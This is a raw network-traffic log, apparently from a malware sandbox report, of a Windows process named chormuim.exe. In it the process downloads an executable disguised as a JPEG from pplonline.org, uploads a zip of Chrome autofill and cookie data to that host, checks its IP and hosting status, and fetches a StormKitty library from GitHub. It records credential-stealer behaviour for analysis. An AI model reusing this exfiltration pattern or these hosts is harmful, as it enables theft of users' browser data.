Jan 14, 2022 13:49:27.435801029 CET	4228	OUT	POST /Cgi//7.jpg HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: pplonline.org Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Jan 14, 2022 13:49:27.588978052 CET	4229	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:27 GMT Server: Apache Last-Modified: Thu, 06 Jun 2019 09:02:02 GMT Accept-Ranges: bytes Content-Length: 83784 Keep-Alive: timeout=5, max=69 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 01 f9 a3 4e 45 98 cd 1d 45 98 cd 1d 45 98 cd 1d f1 04 22 1d 47 98 cd 1d 4c e0 5e 1d 4e 98 cd 1d 45 98 cc 1d 6c 98 cd 1d 9c fa c9 1c 55 98 cd 1d 9c fa ce 1c 56 98 cd 1d 9c fa c8 1c 41 98 cd 1d 9c fa c5 1c 5f 98 cd 1d 9c fa cd 1c 44 98 cd 1d 9c fa 32 1d 44 98 cd 1d 9c fa cf 1c 44 98 cd 1d 52 69 63 68 45 98 cd 1d 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 0c 38 27 59 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0b 00 ea 00 00 00 20 00 00 00 00 00 00 00 ae 00 00 00 10 00 00 00 00 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 bc 11 02 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 b0 f0 00 00 14 09 00 00 c0 10 01 00 8c 00 00 00 00 20 01 00 08 04 00 00 00 00 00 00 00 00 00 00 00 08 01 00 48 3f 00 00 00 30 01 00 94 0a 00 00 b0 1f 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 1f 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 e9 00 00 00 10 00 00 00 ea 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 44 06 00 00 00 00 01 00 00 02 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b8 05 00 00 00 10 01 00 00 06 00 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 08 04 00 00 00 20 01 00 00 06 00 00 00 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 0a 00 00 00 30 01 00 00 0c 00 00 00 fc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 26 00 00 00 d0 26 00 00 01 f0 26 00 00 00 90 27 00 00 00 40 28 00 00 00 d0 2a 00 00 00 00 2b 00 00 00 50 2b 00 00 00 90 2b 00 00 00 a0 2b 00 00 00 b0 2b 00 00 00 c0 2b 00 00 00 d0 2b 00 00 00 20 2c 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$NEEE"GL^NElUVA_D2DDRichEPEL8'Y"! @@A H?08@.text `.dataD@.idata@@.rsrc @@.reloc0@Bp&&&'@(*+P++++++ ,
Jan 14, 2022 13:49:29.727824926 CET	4317	OUT	POST /Cgi//main.php HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 25 Host: pplonline.org Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 2d 2d 0d 0a Data Ascii: --1BEF0A57BE110FD467A--
Jan 14, 2022 13:49:29.965423107 CET	4317	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:29 GMT Server: Apache Content-Length: 0 Keep-Alive: timeout=5, max=68 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jan 14, 2022 13:49:32.576792955 CET	4318	OUT	POST /Cgi/ HTTP/1.1 Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1 Accept-Language: ru-RU,ru;q=0.9,en;q=0.8 Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1 Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0 Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A Content-Length: 91380 Host: pplonline.org Connection: Keep-Alive Cache-Control: no-cache
Jan 14, 2022 13:49:32.576948881 CET	4333	OUT	Data Raw: 2d 2d 31 42 45 46 30 41 35 37 42 45 31 31 30 46 44 34 36 37 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 5f 32 31 36 Data Ascii: --1BEF0A57BE110FD467AContent-Disposition: form-data; name="file"; filename="_2163638761.zip"Content-Type: zipPK8.T"autofill/Google Chrome_Default.txtUTaaaPK8.Tcc/Google Chr
Jan 14, 2022 13:49:32.729332924 CET	4335	OUT	Data Raw: dd 01 ce 61 d2 ff 4c 00 aa 14 f4 af 98 97 4e 88 51 7e 16 2b a4 30 60 fb ef 14 fa e0 ff 33 2f 2c 44 d3 f9 d5 40 ff d0 59 fc 10 26 57 3d cd 6c ed e3 32 9b f5 bf 66 d7 56 98 15 a4 87 5b c8 0b 20 07 40 26 88 e7 fa 62 b0 1d 66 d6 30 ce 0d 59 89 d6 32 Data Ascii: aLNQ~+0`3/,D@Y&W=l2fV[ @&bf0Y2&N~x'Z.wVq%[CQT?qEfl$X]+KGOLRGO!XF<:;,a`:l- Y'\|'fV/LdI "_P
Jan 14, 2022 13:49:32.729408979 CET	4361	OUT	Data Raw: 55 32 67 c8 65 90 45 55 85 c5 9f 67 f7 72 4b 44 4f 78 21 22 b6 43 dc ba 36 56 a9 c8 68 98 f4 5a 60 e6 fe 81 6d 88 6b e9 09 07 f5 07 1c dc ee 0d 76 1f db cd 93 8d ca 32 c4 a7 1b 21 b3 32 ae eb 8c 44 02 a7 6e 9f 14 e5 0c b2 67 f7 b7 c8 dd c6 93 33 Data Ascii: U2geEUgrKDOx!"C6VhZ`mkv2!2Dng3,t#]RR<)pT4]&lFk,\oLU^BITjR@8?jWheyI(ZW,mR;1,xtCM5/~o?
Jan 14, 2022 13:49:32.877376080 CET	4364	OUT	Data Raw: cc bd a7 82 d1 6b 48 0f 81 2c 54 1e 77 be ed 2c da c1 e1 e5 ab 88 3b 72 1b f1 67 5d bd d7 64 af ce 2a f5 2a 28 8f 38 5a d1 b4 7d 17 54 47 09 da 55 a8 14 d1 5b bc 09 7a c9 1d c1 f5 b8 dc 4e e8 a7 da f6 e7 bf 4f 8a 85 22 ce 1c c9 c5 d6 64 1a 2a eb Data Ascii: kH,Tw,;rg]d*(8Z}TGU[zNO"d+\cDCK:t!7/T@+iT=Z5iu`!?K(9HYYhhMUvI1r*X~$a}AHYs+Uy-}wzwT
Jan 14, 2022 13:49:32.877438068 CET	4367	OUT	Data Raw: ef 3c 8f b8 ad 7e eb 57 37 cf ee 9b 42 e4 19 f3 97 98 f1 67 35 75 37 95 bf 53 df 93 b7 c9 1b 14 0f de 29 68 9a 55 59 69 da bd 04 5c 02 a2 0c 2e 01 a1 65 ca c5 e7 66 08 af 27 bf cc 23 26 0d c5 6d 5b 18 c7 1e e7 ff 74 ff b6 5e d9 3c ca 5b 6f b7 e5 Data Ascii: <~W7Bg5u7S)hUYi\.ef'#&m[t^<[oqsyw+._FS[5i>i!Ks@1Nj~'*JE]p"]@QrdaGJ~a{<z]>x<oL&C
Jan 14, 2022 13:49:32.877449989 CET	4374	OUT	Data Raw: 50 95 3f c2 6c 2a 88 05 d3 c5 17 5a 5a e9 72 cc 12 41 d8 9f ef bb 22 d0 89 5d 56 12 41 d9 f1 c1 4f ee 43 b4 a6 df 58 3d ff 39 e4 f8 69 f1 05 b0 52 ea 17 26 6a a2 92 a5 58 34 9a 9e 9e 27 6a c8 9d 46 85 b0 cf 03 2c ee 54 1c 76 e0 9a fd 6f 39 8f 61 Data Ascii: P?l*ZZrA"]VAOCX=9iR&jX4'jF,Tvo9aG#:4LwS!XWk:@#?OucMu$T<8{=\3pcDEy%CP{![AQ1~\|T/F"+"qv6c!$s<-LL
Jan 14, 2022 13:49:32.877477884 CET	4380	OUT	Data Raw: 5e 44 5b 42 32 17 93 39 f2 57 08 64 d5 97 c8 ab ff c5 36 13 50 d1 2a 52 15 bf 5f 78 9b 01 2d 04 25 25 b0 08 02 98 a2 fd a7 4f 97 0d 89 b3 48 0a a6 72 79 8c f0 cb fd d0 49 e5 8a ca dc 56 c1 7c 66 ca 8d 1a 48 ed 07 91 d0 88 c0 d9 e2 b0 be 66 7e 99 Data Ascii: ^D[B29Wd6PR_x-%%OHryIV\|fHf~xA!'JI0v0!wEK(4<H0b$`YvJChODUVaIX`E7ag3T3e90u18nif /Mo.:QQR
Jan 14, 2022 13:49:32.877530098 CET	4388	OUT	Data Raw: 8d b1 7e 51 02 d3 0d 43 f8 0f 73 aa bc 24 07 d6 e4 70 e7 47 e7 c5 2a 53 58 92 71 e3 a0 73 1f 4a 69 c6 80 a6 e9 e4 20 a4 2b df 8b b0 94 bb 2a ea d4 2a 55 04 ff 6c 09 9c 11 c9 b3 c1 51 6b 9b 1a dc 45 db df 21 2c 5e 93 79 76 17 2d 08 bf 82 bb a6 9a Data Ascii: ~QCs$pGSXqsJi +*UlQkE!,^yv-FJ.Tt}G_]N:?fvT\|iG<Ep$_[R>{PoU64jTg`Sflq9l]Cp.{(G=gWO1t%ZBp_=$'
Jan 14, 2022 13:49:32.877559900 CET	4391	OUT	Data Raw: 6b 29 13 1d a7 aa c3 e7 f1 c8 f7 5f f3 55 f3 44 5d 4b 91 04 32 94 14 9e 05 25 96 45 fc c9 d3 1e 22 bf c7 0e 53 17 4b 37 ab d5 72 6b e1 47 0b 36 47 54 71 9b bb 4c 12 d5 f3 be ce 87 4c 22 f4 44 73 da 97 58 42 9a 06 43 24 a7 73 e5 67 54 52 07 e1 39 Data Ascii: k)_UD]K2%E"SK7rkG6GTqLL"DsXBC$sgTR97NG>uV]{4)9wZoXYyn^R~o{t68U$~\9qfVOHpID+/}g7j ?#~ftj+kjHR+~~
Jan 14, 2022 13:49:32.877599955 CET	4396	OUT	Data Raw: ae 5f 1b de 37 60 ba d7 eb 74 29 ba f9 91 1f 03 81 5f 97 2f 81 1f c5 e9 4e ac cd 30 b7 94 78 79 ff a3 80 63 76 0c 2b d1 8a 38 72 1b 79 95 4d 68 cd 4c 91 90 d8 4c ee 49 54 bc 97 93 88 e9 92 ce 37 1a fa 66 f9 2c 05 57 17 fe ba 88 4f b7 e5 85 3c 6c Data Ascii: _7`t)_/N0xycv+8ryMhLLIT7f,WO<l_8uJ~)ZwR,I'.HIPIG"`R}yCfr)Fpf&w,7#M}4Soih\l]HBBB MD5Wz\|5-B)-j'R(7
Jan 14, 2022 13:49:33.088490963 CET	4409	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:32 GMT Server: Apache Content-Length: 0 Keep-Alive: timeout=5, max=67 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49744	208.95.112.1	80	C:\Users\user\AppData\Local\Temp\chormuim.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 13:49:36.431510925 CET	4409	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jan 14, 2022 13:49:36.461532116 CET	4409	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:35 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 5 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 74 72 75 65 0a Data Ascii: true

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49750	104.18.115.97	80	C:\Users\user\AppData\Local\Temp\chormuim.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 13:49:44.805115938 CET	5213	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Jan 14, 2022 13:49:44.833376884 CET	5214	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:44 GMT Content-Type: text/plain Content-Length: 12 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=nbBK3CjQI5Jevqiy1dP6sLxlpCxosLFBJQZXZC4XOEA-1642164584-0-AS/MxZnMcLscoxCya6HTrXroJhtL7DM/6VAAOmtMJ/sPK1MM3dLtmJfNebSvcgbHXs5Z1HhSEN/EG2UCoK2LEbw=; path=/; expires=Fri, 14-Jan-22 13:19:44 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 6cd6fc6f1a965c38-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 Data Raw: 38 34 2e 31 37 2e 35 32 2e 31 38 0a Data Ascii: 84.17.52.18

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49751	208.95.112.1	80	C:\Users\user\AppData\Local\Temp\chormuim.exe

Timestamp	kBytes transferred	Direction	Data
Jan 14, 2022 13:49:48.181268930 CET	5215	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Jan 14, 2022 13:49:48.213846922 CET	5215	IN	HTTP/1.1 200 OK Date: Fri, 14 Jan 2022 12:49:47 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 5 Access-Control-Allow-Origin: * X-Ttl: 48 X-Rl: 43 Data Raw: 74 72 75 65 0a Data Ascii: true

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49745	185.199.108.133	443	C:\Users\user\AppData\Local\Temp\chormuim.exe

Timestamp	kBytes transferred	Direction	Data
2022-01-14 12:49:37 UTC	0	OUT	GET /caxmd/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13.8/lib/net40/DotNetZip.dll HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2022-01-14 12:49:37 UTC	0	IN	HTTP/1.1 200 OK Connection: close Content-Length: 458752 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: application/octet-stream ETag: "b22319c6af806c4aa2082e3d1cfe365ec1a7a2950e641daa93eb0c19d9ae048f" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 8818:16DA:110F11D:11BD105:61E17161 Accept-Ranges: bytes Date: Fri, 14 Jan 2022 12:49:37 GMT Via: 1.1 varnish X-Served-By: cache-mxp6974-MXP X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1642164577.487972,VS0,VE175 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * X-Fastly-Request-ID: 811eeaf509900697aa2833bf74aa5e7e81bf878c Expires: Fri, 14 Jan 2022 12:54:37 GMT Source-Age: 0
2022-01-14 12:49:37 UTC	0	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ff ad c6 5e 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 f8 06 00 00 06 00 00 00 00 00 00 b6 e9 06 00 00 20 00 00 00 20 07 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 07 00 00 02 00 00 e3 77 07 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL^" 0 `w@
2022-01-14 12:49:37 UTC	2	IN	Data Raw: 05 00 c5 00 00 00 05 00 00 11 03 28 31 00 00 0a 2c 47 02 1b 8d 5d 00 00 01 25 16 72 59 00 00 70 a2 25 17 7e 32 00 00 0a 0a 12 00 28 33 00 00 0a a2 25 18 03 a2 25 19 7e 32 00 00 0a 0a 12 00 28 33 00 00 0a a2 25 1a 72 5d 00 00 70 a2 28 34 00 00 0a 7d 1a 00 00 04 2b 07 02 03 7d 1a 00 00 04 02 72 65 00 00 70 02 7b 1a 00 00 04 28 35 00 00 0a 72 69 00 00 70 72 7b 00 00 70 6f 36 00 00 0a 72 ab 00 00 70 72 b5 00 00 70 6f 36 00 00 0a 72 cb 00 00 70 72 d1 00 00 70 6f 36 00 00 0a 72 d7 00 00 70 72 dd 00 00 70 6f 36 00 00 0a 72 ed 00 00 70 28 37 00 00 0a 7d 18 00 00 04 02 02 7b 18 00 00 04 17 73 38 00 00 0a 7d 17 00 00 04 2a 00 00 00 13 30 03 00 4b 00 00 00 00 00 00 00 73 1f 00 00 0a 25 72 f1 00 00 70 6f 20 00 00 0a 02 7b 19 00 00 04 8c 04 00 00 02 28 3c 00 00 06 6f Data Ascii: (1,G]%rYp%~2(3%%~2(3%r]p(4}+}rep{(5ripr{po6rprpo6rprpo6rprpo6rp(7}{s8}*0Ks%rpo {(<o
2022-01-14 12:49:37 UTC	3	IN	Data Raw: 3c 00 00 06 6f 20 00 00 0a 72 0d 00 00 70 6f 20 00 00 0a 02 28 1d 00 00 06 6f 20 00 00 0a 26 6f 22 00 00 0a 2a 00 00 00 13 30 02 00 1a 00 00 00 08 00 00 11 16 0a 02 7b 1d 00 00 04 04 5f 04 33 09 03 04 5f 04 fe 01 0a 2b 02 17 0a 06 2a 00 00 13 30 02 00 24 00 00 00 0a 00 00 11 03 28 31 00 00 0a 2c 0d 02 7b 1e 00 00 04 1a fe 01 16 fe 01 2a 03 28 44 00 00 0a 0a 02 06 28 22 00 00 06 2a 13 30 03 00 5e 00 00 00 08 00 00 11 02 03 18 28 20 00 00 06 0a 06 2c 09 02 03 1a 28 20 00 00 06 0a 06 2c 09 02 03 17 28 20 00 00 06 0a 06 2c 0a 02 03 1f 20 28 20 00 00 06 0a 06 2c 0d 02 03 20 00 20 00 00 28 20 00 00 06 0a 06 2c 0d 02 03 20 00 04 00 00 28 20 00 00 06 0a 02 7b 1e 00 00 04 1a 2e 05 06 16 fe 01 0a 06 2a 00 00 13 30 02 00 0f 00 00 00 0a 00 00 11 03 6f 58 03 00 06 0a Data Ascii: <o rpo (o &o"0{_3_+0$(1,{(D("0^( ,( ,( , ( , ( , ( {.*0oX
2022-01-14 12:49:37 UTC	5	IN	Data Raw: 08 11 08 20 84 29 34 5d 42 8f 00 00 00 11 08 20 84 9a 0c 2c 35 43 11 08 20 13 ec a6 13 35 1d 11 08 20 a6 c2 29 0f 3b fd 00 00 00 11 08 20 13 ec a6 13 3b 75 01 00 00 38 21 08 00 00 11 08 20 5c d9 a0 23 3b a6 01 00 00 11 08 20 84 9a 0c 2c 3b 2c 01 00 00 38 04 08 00 00 11 08 20 88 09 11 3f 35 1d 11 08 20 17 9c 0c 2d 3b fc 00 00 00 11 08 20 88 09 11 3f 3b 8a 01 00 00 38 de 07 00 00 11 08 20 4d f1 27 51 3b d1 01 00 00 11 08 20 84 29 34 5d 3b bd 00 00 00 38 c1 07 00 00 11 08 20 4d bc b9 a3 35 43 11 08 20 15 36 d0 83 35 1d 11 08 20 c5 9d 1c 81 3b b8 01 00 00 11 08 20 15 36 d0 83 3b 12 01 00 00 38 92 07 00 00 11 08 20 e6 bd 39 8d 3b 43 01 00 00 11 08 20 4d bc b9 a3 3b b3 00 00 00 38 75 07 00 00 11 08 20 7e db 6b cc 35 1a 11 08 20 51 11 25 ac 3b c5 00 00 00 11 08 Data Ascii: )4]B ,5C 5 ); ;u8! \#; ,;,8 ?5 -; ?;8 M'Q; )4];8 M5C 65 ; 6;8 9;C M;8u ~k5 Q%;
2022-01-14 12:49:37 UTC	6	IN	Data Raw: 0a 38 0d 01 00 00 11 0b 6f 41 00 00 0a 72 a9 04 00 70 6f 57 00 00 0a 2c 2b 11 0b 16 11 0b 6f 3d 00 00 0a 17 59 6f 58 00 00 0a 28 59 00 00 0a 20 00 04 00 00 6a 5a 20 00 04 00 00 6a 5a 13 0a 38 cf 00 00 00 11 0b 6f 41 00 00 0a 72 ad 04 00 70 6f 57 00 00 0a 2c 2b 11 0b 16 11 0b 6f 3d 00 00 0a 18 59 6f 58 00 00 0a 28 59 00 00 0a 20 00 04 00 00 6a 5a 20 00 04 00 00 6a 5a 13 0a 38 91 00 00 00 11 0b 6f 41 00 00 0a 72 b3 04 00 70 6f 57 00 00 0a 2c 2f 11 0b 16 11 0b 6f 3d 00 00 0a 17 59 6f 58 00 00 0a 28 59 00 00 0a 20 00 04 00 00 6a 5a 20 00 04 00 00 6a 5a 20 00 04 00 00 6a 5a 13 0a 2b 4f 11 0b 6f 41 00 00 0a 72 b7 04 00 70 6f 57 00 00 0a 2c 2f 11 0b 16 11 0b 6f 3d 00 00 0a 18 59 6f 58 00 00 0a 28 59 00 00 0a 20 00 04 00 00 6a 5a 20 00 04 00 00 6a 5a 20 00 04 00 Data Ascii: 8oArpoW,+o=YoX(Y jZ jZ8oArpoW,+o=YoX(Y jZ jZ8oArpoW,/o=YoX(Y jZ jZ jZ+OoArpoW,/o=YoX(Y jZ jZ
2022-01-14 12:49:37 UTC	7	IN	Data Raw: 00 00 01 10 00 00 02 00 1b 00 23 3e 00 0a 00 00 00 00 1b 30 04 00 ac 00 00 00 10 00 00 11 03 2d 0b 72 25 05 00 70 73 63 00 00 0a 7a 73 64 00 00 0a 0a 04 2c 12 04 72 7f 03 00 70 72 83 03 00 70 6f 36 00 00 0a 2b 01 14 0b 07 2c 1f 2b 10 07 16 07 6f 3d 00 00 0a 17 59 6f 58 00 00 0a 0b 07 72 83 03 00 70 6f 57 00 00 0a 2d e3 03 6f 74 02 00 06 0c 2b 40 08 6f 18 00 00 0a 0d 04 2c 26 09 6f 5b 03 00 06 28 66 00 00 0a 04 28 47 00 00 0a 2d 13 09 6f 5b 03 00 06 28 66 00 00 0a 07 28 47 00 00 0a 2c 10 02 09 28 38 00 00 06 2c 07 06 09 6f 65 00 00 0a 08 6f 17 00 00 0a 2d b8 de 0a 08 2c 06 08 6f 13 00 00 0a dc 06 2a 01 10 00 00 02 00 54 00 4c a0 00 0a 00 00 00 00 13 30 03 00 3b 00 00 00 11 00 00 11 02 6f 67 00 00 0a 02 6f 22 00 00 0a 6f 68 00 00 0a d0 0f 00 00 01 28 51 00 Data Ascii: #>0-r%psczsd,rprpo6+,+o=YoXrpoW-ot+@o,&o[(f(G-o[(f(G,(8,oeo-,o*TL0;ogo"oh(Q
2022-01-14 12:49:37 UTC	9	IN	Data Raw: 04 18 5a 8f 69 00 00 01 25 48 17 58 68 53 2b 38 11 04 1f 0a 30 1a 02 7b 62 00 00 04 7e 2d 01 00 04 18 5a 8f 69 00 00 01 25 48 17 58 68 53 2b 18 02 7b 62 00 00 04 7e 2e 01 00 04 18 5a 8f 69 00 00 01 25 48 17 58 68 53 16 13 04 08 0b 09 2d 0c 20 8a 00 00 00 13 05 19 13 06 2b 12 08 09 33 08 1c 13 05 19 13 06 2b 06 1d 13 05 1a 13 06 06 17 58 0a 06 04 3e 24 ff ff ff 2a 00 00 13 30 05 00 7a 00 00 00 13 00 00 11 02 02 7b 60 00 00 04 02 7b 63 00 00 04 7b 07 01 00 04 28 45 00 00 06 02 02 7b 61 00 00 04 02 7b 64 00 00 04 7b 07 01 00 04 28 45 00 00 06 02 7b 65 00 00 04 02 6f ed 00 00 06 7e 26 01 00 04 17 59 0a 2b 18 02 7b 62 00 00 04 7e 00 01 00 04 06 90 18 5a 17 58 92 2d 08 06 17 59 0a 06 19 2f e4 02 02 7b 6f 00 00 04 19 06 17 58 5a 1b 58 1b 58 1a 58 58 7d 6f 00 00 Data Ascii: Zi%HXhS+80{b~-Zi%HXhS+{b~.Zi%HXhS- +3+X>$*0z{`{c{(E{a{d{(E{eo~&Y+{b~ZX-Y/{oXZXXXX}o
2022-01-14 12:49:37 UTC	10	IN	Data Raw: 00 00 04 18 5b 2f 08 06 07 18 5b 2f 02 17 2a 02 7b 6d 00 00 04 02 7b 6c 00 00 04 17 59 2e 0f 02 7b 6d 00 00 04 02 7b 6c 00 00 04 fe 01 2a 17 2a 00 00 13 30 04 00 f9 00 00 00 19 00 00 11 16 0c 02 7b 6d 00 00 04 39 ce 00 00 00 02 7b 6e 00 00 04 08 18 5a 58 13 05 02 7b 44 00 00 04 11 05 91 1e 62 20 00 ff 00 00 5f 02 7b 44 00 00 04 11 05 17 58 91 20 ff 00 00 00 5f 60 0a 02 7b 44 00 00 04 02 7b 6b 00 00 04 08 58 91 20 ff 00 00 00 5f 0b 08 17 58 0c 06 2d 0a 02 07 03 28 4a 00 00 06 2b 6b 7e 03 01 00 04 07 90 0d 02 09 7e 28 01 00 04 58 17 58 03 28 4a 00 00 06 7e fd 00 00 04 09 94 13 04 11 04 2c 13 07 7e 04 01 00 04 09 94 59 0b 02 07 11 04 28 4b 00 00 06 06 17 59 0a 06 28 eb 00 00 06 0d 02 09 04 28 4a 00 00 06 7e fe 00 00 04 09 94 13 04 11 04 2c 13 06 7e 05 01 00 Data Ascii: [/[/{m{lY.{m{l*0{m9{nZX{Db _{DX _`{D{kX _X-(J+k~~(XX(J~,~Y(KY((J~,~
